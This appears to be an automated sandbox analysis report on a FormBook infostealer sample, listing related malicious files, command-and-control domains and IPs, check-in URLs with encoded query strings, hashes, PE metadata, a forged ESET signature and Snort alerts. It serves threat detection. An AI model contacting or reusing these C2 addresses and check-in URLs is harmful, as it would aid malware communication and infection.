                                                                      • www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx
                                                                      Swift-Payment_Details.xlsxGet hashmaliciousBrowse
                                                                      • www.scuolatua.com/dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL
                                                                      soa-032119.exeGet hashmaliciousBrowse
                                                                      • www.tarantocapitaledimare.info/uo4x/?YlZl7lOP=jTZlegwSGPjlhtAzPxCCf411jaMgyLVKHPuQ/an1ShB/bAjBzaBfWNXR1tIMXWc2fZB/&x2=w4ILpBPxWhb
                                                                      Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                      • www.scuolatua.com/dy8g/?3f=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9hjdYbxQvjgu&XRtpal=y48HaFr
                                                                      0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                      • www.scuolatua.com/dy8g/?rVW8M4=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9hj3HrBQrhou&8pWL=Wlch
                                                                      URGENT REQUEST FOR QUOTATION (RFQ REF R2100131410).exeGet hashmaliciousBrowse
                                                                      • www.goldinsacks.com/dp3a/?-ZP=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35yXCLpOJnP&u6UPH=XbuDZ
                                                                      UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                                      • www.goldinsacks.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP
                                                                      RFQ - Upgrade Project (PML) 0000052021.exeGet hashmaliciousBrowse
                                                                      • www.goldinsacks.com/dp3a/?Qxo=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35yXCLpOJnP&MJBD=FdFp3xAhctetbXf0
                                                                      a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • www.pisanosportpraxis.com/ued5/?t8o8ntU=GUK9sjNbD89abTK6FD0fM0HcLYLNxgR27Mwej6WDWVFny8CdmUlNI3bKr8QSth3jMvuv&kRm0q=J48P
                                                                      4xMdbgzeJQ.exeGet hashmaliciousBrowse
                                                                      • www.cvacity.info/m2be/?G8oTcJoh=+ymgIVB+JkWP6R7YCSTG+4Qmonnd1NOjLVHuSK9LognEyCSSwr46yM8J3NKVrc9U7VJG&zN9lV=1bj8JTVpMltD8T6P

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      www.mentalnayaarifmetika.onlinewb0m2oAvKr.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      jwRbEDUUZC.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      zjWQY3wxxX.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      HAvChG9FbV.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      Eyyz1EU8ia.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      NCVPJzfa0w.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      fooYgfbxno.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      ntrebare ES220062.xlsxGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      F3cCuwtbgc.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      Pa5BQv8oni.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      8x6zeIBDXJ.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      shops.myshopify.comTT copy.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PRE-ALERT ==HTHC22031529.scrGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      EwF4PTC8NF.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Popis narudzbi u prilogu.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Nova ozljeda 034245627782.DOC.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      jLVXJRVrps.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Company Profile.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Company Profile.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Novi cjenik u prilogu.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      SecuriteInfo.com.Variant.Tedy.120874.17150.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Advance Payment-pdf.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      IVN 725434522.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      SecuriteInfo.com.W32.AIDetectNet.01.18544.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      novo pedido.pdf.zGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      SecuriteInfo.com.Variant.Tedy.122593.12781.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Bolt,Screw and Nuts Pdf.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      louCCFrO4t.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PO-INQUIRY-VALE-SP-2022-60.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      2gl1wtChCW.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      UKRAINE-ASUAyW4CYO3d2Z.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.31
                                                                      Kn7vI9IYMc3QOV4.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.61
                                                                      Eyyz1EU8ia.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      NCVPJzfa0w.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      fooYgfbxno.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      ntrebare ES220062.xlsxGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      F3cCuwtbgc.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      Pa5BQv8oni.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      KEie4St7TtGet hashmaliciousBrowse
                                                                      • 185.104.45.9
                                                                      ssig4a96vhGet hashmaliciousBrowse
                                                                      • 185.68.16.47
                                                                      uUxLhCncpZGet hashmaliciousBrowse
                                                                      • 185.104.45.9
                                                                      Linux_x86Get hashmaliciousBrowse
                                                                      • 185.104.45.9
                                                                      8x6zeIBDXJ.exeGet hashmaliciousBrowse
                                                                      • 185.68.16.179
                                                                      bank in slip-Inv 3489.exeGet hashmaliciousBrowse
                                                                      • 185.104.45.90
                                                                      DHL.exeGet hashmaliciousBrowse
                                                                      • 185.104.45.110
                                                                      FATURA_S.EXEGet hashmaliciousBrowse
                                                                      • 185.104.45.76
                                                                      WegGjzNat2.exeGet hashmaliciousBrowse
                                                                      • 185.104.45.141
                                                                      SKMBT14032022.xlsxGet hashmaliciousBrowse
                                                                      • 185.233.37.223
                                                                      Order list.xlsxGet hashmaliciousBrowse
                                                                      • 185.104.45.151
                                                                      NEASIalsfD.exeGet hashmaliciousBrowse
                                                                      • 91.206.201.89
                                                                      ARUBA-ASNIT11LbTZ3r9hGet hashmaliciousBrowse
                                                                      • 62.149.187.176
                                                                      KWxsuEuN4yGet hashmaliciousBrowse
                                                                      • 95.110.130.130
                                                                      xNOPp4zAWuGet hashmaliciousBrowse
                                                                      • 94.177.219.206
                                                                      AEstFaJusGGet hashmaliciousBrowse
                                                                      • 31.14.139.61
                                                                      ZiN5S8WV3rGet hashmaliciousBrowse
                                                                      • 31.14.139.74
                                                                      UnHAnaAW.x86Get hashmaliciousBrowse
                                                                      • 31.14.139.62
                                                                      https://www.raffaelealicino.com/jose/message/Get hashmaliciousBrowse
                                                                      • 89.46.109.38
                                                                      RIBB1B2IrQ.dllGet hashmaliciousBrowse
                                                                      • 212.237.17.99
                                                                      idc501DYmE.dllGet hashmaliciousBrowse
                                                                      • 212.237.17.99
                                                                      Bill Of Lading-Original_xlsx.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.45
                                                                      Commercial Invoice_xlsx.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.45
                                                                      nFRbz7jrkO.dllGet hashmaliciousBrowse
                                                                      • 94.177.178.26
                                                                      nFRbz7jrkO.dllGet hashmaliciousBrowse
                                                                      • 94.177.178.26
                                                                      6BV8I2Luce.dllGet hashmaliciousBrowse
                                                                      • 94.177.178.26
                                                                      sbawgpcdy.dllGet hashmaliciousBrowse
                                                                      • 212.237.17.99
                                                                      Tsunami.arm7Get hashmaliciousBrowse
                                                                      • 95.110.143.2
                                                                      YYpCTqetuVGet hashmaliciousBrowse
                                                                      • 95.110.130.113
                                                                      kuCwPmEwdMGet hashmaliciousBrowse
                                                                      • 31.14.139.88
                                                                      fbrrA6l6TaGet hashmaliciousBrowse
                                                                      • 94.177.219.227
                                                                      https://urlsand.esvalabs.com/?u=https%3A%2F%2Fexpress.adobe.com%2Fpage%2FfeoM5782aYABf%2F&e=d02f10fa&h=34edaf6a&f=y&p=yGet hashmaliciousBrowse
                                                                      • 80.211.49.112

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gZU26RjMUU.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\gZU26RjMUU.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):226
                                                                      Entropy (8bit):5.3467126928258955
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                      MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                      SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                      SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                      SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.09937088973753
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:gZU26RjMUU.exe
                                                                      File size:325144
                                                                      MD5:5daed332426c66a3852518126bc49dfe
                                                                      SHA1:1669f6cebdc4daae7f7f7391bb62ac74bad5ef00
                                                                      SHA256:12fd506bab09a036a69b32535df6392d533a5ad8112c8b7bf287647f8c032bb0
                                                                      SHA512:b2f579dd70b88b33ff9d594f6e15ff9a883464d7244f78f98651bede4a70edc1fe240c3766e38e6e9237ffcb853f22efc427cfb3fe30e93a863ca0ee7ffa19e8
                                                                      SSDEEP:3072:0B9depcfLJS8XgNHAKlqT+f5OYtm2MWNRux3fdMCnGRwcRdhpsedBHX86gP6Ajy+:4S8QaEsYXudVLCXpFM6gPcn/DFsqM
                                                                      TLSH:B264CE47BBAC9B8DDB09CBB9397196300660CFB766259A11F8D4FE3C09B139D32406E1
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..b............................RM... ...`....@.. ....................... .......i....`................................

                                                                      File Icon

                                                                      Icon Hash:eacece96d6cae8f0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x434d52
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                      Time Stamp:0x6296A442 [Tue May 31 23:26:58 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Authenticode Signature

                                                                      Signature Valid:false
                                                                      Signature Issuer:CN=Entrust Extended Validation Code Signing CA - EVCS1, OU="(c) 2015 Entrust, Inc. - for authorized use only", OU=See www.entrust.net/legal-terms, O="Entrust, Inc.", C=US
                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                      Error Number:-2146869232
                                                                      Not Before, Not After
                                                                      • 12/8/2020 6:34:57 AM 12/8/2023 6:34:56 AM
                                                                      Subject Chain
                                                                      • CN="ESET, spol. s r.o.", SERIALNUMBER=31 333 532, OID.2.5.4.15=Private Organization, O="ESET, spol. s r.o.", OID.1.3.6.1.4.1.311.60.2.1.3=SK, L=Bratislava, C=SK
                                                                      Version:3
                                                                      Thumbprint MD5:958E814BF6B12FAD5E25D4A0A9F789FA
                                                                      Thumbprint SHA-1:134B03AA165A151DC80CA5F7CF98290D1612FAA1
                                                                      Thumbprint SHA-256:ADB1AAF5A21CC0A45C048FD018423FCCC6D011CF63389705DB95FACA55448014
                                                                      Serial:05F97D054A9BFCBF9D5E12F8D0ABBE07

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x34cf80x57.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x19c1a.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x4d0000x2618.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x307140x1c.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x32d580x32e00False0.944194371929data7.926371695IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .reloc0x360000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x380000x19c1a0x19e00False0.11199803744data3.75264116403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0x381980x1520PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                      RT_ICON0x396b80x10828dBase III DBT, version number 0, next free block index 40
                                                                      RT_ICON0x49ee00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                      RT_ICON0x4e1080x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                      RT_ICON0x506b00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 350084303, next used block 0
                                                                      RT_ICON0x517580x468GLS_BINARY_LSB_FIRST
                                                                      RT_GROUP_ICON0x51bc00x5adata

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      192.168.2.5162.241.253.23149854802031453 06/05/22-13:05:41.704788TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985480192.168.2.5162.241.253.231
                                                                      192.168.2.5162.241.253.23149854802031412 06/05/22-13:05:41.704788TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985480192.168.2.5162.241.253.231
                                                                      192.168.2.537.187.131.15049950802031453 06/05/22-13:07:36.511560TCP2031453ET TROJAN FormBook CnC Checkin (GET)4995080192.168.2.537.187.131.150
                                                                      192.168.2.562.149.128.4049944802031453 06/05/22-13:07:05.906967TCP2031453ET TROJAN FormBook CnC Checkin (GET)4994480192.168.2.562.149.128.40
                                                                      192.168.2.5203.170.80.25049943802031449 06/05/22-13:06:55.560019TCP2031449ET TROJAN FormBook CnC Checkin (GET)4994380192.168.2.5203.170.80.250
                                                                      192.168.2.537.187.131.15049950802031449 06/05/22-13:07:36.511560TCP2031449ET TROJAN FormBook CnC Checkin (GET)4995080192.168.2.537.187.131.150
                                                                      192.168.2.5203.170.80.25049943802031412 06/05/22-13:06:55.560019TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994380192.168.2.5203.170.80.250
                                                                      192.168.2.562.149.128.4049944802031412 06/05/22-13:07:05.906967TCP2031412ET TROJAN FormBook CnC Checkin (GET)4994480192.168.2.562.149.128.40
                                                                      192.168.2.537.187.131.15049950802031412 06/05/22-13:07:36.511560TCP2031412ET TROJAN FormBook CnC Checkin (GET)4995080192.168.2.537.187.131.150
                                                                      192.168.2.5162.241.253.23149854802031449 06/05/22-13:05:41.704788TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985480192.168.2.5162.241.253.231
                                                                      192.168.2.5203.170.80.25049943802031453 06/05/22-13:06:55.560019TCP2031453ET TROJAN FormBook CnC Checkin (GET)4994380192.168.2.5203.170.80.250
                                                                      192.168.2.562.149.128.4049944802031449 06/05/22-13:07:05.906967TCP2031449ET TROJAN FormBook CnC Checkin (GET)4994480192.168.2.562.149.128.40

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 5, 2022 13:05:41.558053017 CEST4985480192.168.2.5162.241.253.231
                                                                      Jun 5, 2022 13:05:41.704302073 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:41.704590082 CEST4985480192.168.2.5162.241.253.231
                                                                      Jun 5, 2022 13:05:41.704787970 CEST4985480192.168.2.5162.241.253.231
                                                                      Jun 5, 2022 13:05:41.850785017 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100227118 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100255013 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100271940 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100291014 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100308895 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100322008 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100338936 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100356102 CEST8049854162.241.253.231192.168.2.5
                                                                      Jun 5, 2022 13:05:42.100429058 CEST4985480192.168.2.5162.241.253.231
                                                                      Jun 5, 2022 13:05:42.100631952 CEST4985480192.168.2.5162.241.253.231
                                                                      Jun 5, 2022 13:05:42.100795984 CEST4985480192.168.2.5162.241.253.231
                                                                      Jun 5, 2022 13:05:47.300776958 CEST4985880192.168.2.535.201.101.222
                                                                      Jun 5, 2022 13:05:47.317383051 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.317538977 CEST4985880192.168.2.535.201.101.222
                                                                      Jun 5, 2022 13:05:47.317672014 CEST4985880192.168.2.535.201.101.222
                                                                      Jun 5, 2022 13:05:47.334283113 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.620153904 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.620194912 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.620224953 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.620248079 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.620381117 CEST4985880192.168.2.535.201.101.222
                                                                      Jun 5, 2022 13:05:47.620450020 CEST4985880192.168.2.535.201.101.222
                                                                      Jun 5, 2022 13:05:47.635575056 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.635596037 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.635667086 CEST804985835.201.101.222192.168.2.5
                                                                      Jun 5, 2022 13:05:47.635711908 CEST4985880192.168.2.535.201.101.222
                                                                      Jun 5, 2022 13:05:47.635761976 CEST4985880192.168.2.535.201.101.222
                                                                      Jun 5, 2022 13:05:47.635766983 CEST4985880192.168.2.535.201.101.222
                                                                      Jun 5, 2022 13:05:52.751885891 CEST4986480192.168.2.523.80.123.107
                                                                      Jun 5, 2022 13:05:55.742945910 CEST4986480192.168.2.523.80.123.107
                                                                      Jun 5, 2022 13:06:01.757582903 CEST4986480192.168.2.523.80.123.107
                                                                      Jun 5, 2022 13:06:16.920408010 CEST4991280192.168.2.523.80.123.107
                                                                      Jun 5, 2022 13:06:19.931056023 CEST4991280192.168.2.523.80.123.107
                                                                      Jun 5, 2022 13:06:25.931484938 CEST4991280192.168.2.523.80.123.107
                                                                      Jun 5, 2022 13:06:28.974280119 CEST4993980192.168.2.5185.129.100.127
                                                                      Jun 5, 2022 13:06:29.001080990 CEST8049939185.129.100.127192.168.2.5
                                                                      Jun 5, 2022 13:06:29.001207113 CEST4993980192.168.2.5185.129.100.127
                                                                      Jun 5, 2022 13:06:29.001353979 CEST4993980192.168.2.5185.129.100.127
                                                                      Jun 5, 2022 13:06:29.027084112 CEST8049939185.129.100.127192.168.2.5
                                                                      Jun 5, 2022 13:06:29.076601982 CEST8049939185.129.100.127192.168.2.5
                                                                      Jun 5, 2022 13:06:29.076683998 CEST8049939185.129.100.127192.168.2.5
                                                                      Jun 5, 2022 13:06:29.076770067 CEST4993980192.168.2.5185.129.100.127
                                                                      Jun 5, 2022 13:06:29.076890945 CEST4993980192.168.2.5185.129.100.127
                                                                      Jun 5, 2022 13:06:29.384911060 CEST4993980192.168.2.5185.129.100.127
                                                                      Jun 5, 2022 13:06:29.410906076 CEST8049939185.129.100.127192.168.2.5
                                                                      Jun 5, 2022 13:06:39.760540962 CEST4994180192.168.2.5185.68.16.179
                                                                      Jun 5, 2022 13:06:39.804711103 CEST8049941185.68.16.179192.168.2.5
                                                                      Jun 5, 2022 13:06:39.804811954 CEST4994180192.168.2.5185.68.16.179
                                                                      Jun 5, 2022 13:06:39.805007935 CEST4994180192.168.2.5185.68.16.179
                                                                      Jun 5, 2022 13:06:39.848977089 CEST8049941185.68.16.179192.168.2.5
                                                                      Jun 5, 2022 13:06:39.849564075 CEST8049941185.68.16.179192.168.2.5
                                                                      Jun 5, 2022 13:06:39.849598885 CEST8049941185.68.16.179192.168.2.5
                                                                      Jun 5, 2022 13:06:39.850153923 CEST4994180192.168.2.5185.68.16.179
                                                                      Jun 5, 2022 13:06:39.866434097 CEST4994180192.168.2.5185.68.16.179
                                                                      Jun 5, 2022 13:06:39.910371065 CEST8049941185.68.16.179192.168.2.5
                                                                      Jun 5, 2022 13:06:55.343496084 CEST4994380192.168.2.5203.170.80.250
                                                                      Jun 5, 2022 13:06:55.559674025 CEST8049943203.170.80.250192.168.2.5
                                                                      Jun 5, 2022 13:06:55.559851885 CEST4994380192.168.2.5203.170.80.250
                                                                      Jun 5, 2022 13:06:55.560019016 CEST4994380192.168.2.5203.170.80.250
                                                                      Jun 5, 2022 13:06:55.770768881 CEST8049943203.170.80.250192.168.2.5
                                                                      Jun 5, 2022 13:06:55.770790100 CEST8049943203.170.80.250192.168.2.5
                                                                      Jun 5, 2022 13:06:55.770935059 CEST4994380192.168.2.5203.170.80.250
                                                                      Jun 5, 2022 13:06:55.770968914 CEST4994380192.168.2.5203.170.80.250
                                                                      Jun 5, 2022 13:06:55.983212948 CEST8049943203.170.80.250192.168.2.5
                                                                      Jun 5, 2022 13:07:05.876817942 CEST4994480192.168.2.562.149.128.40
                                                                      Jun 5, 2022 13:07:05.906688929 CEST804994462.149.128.40192.168.2.5
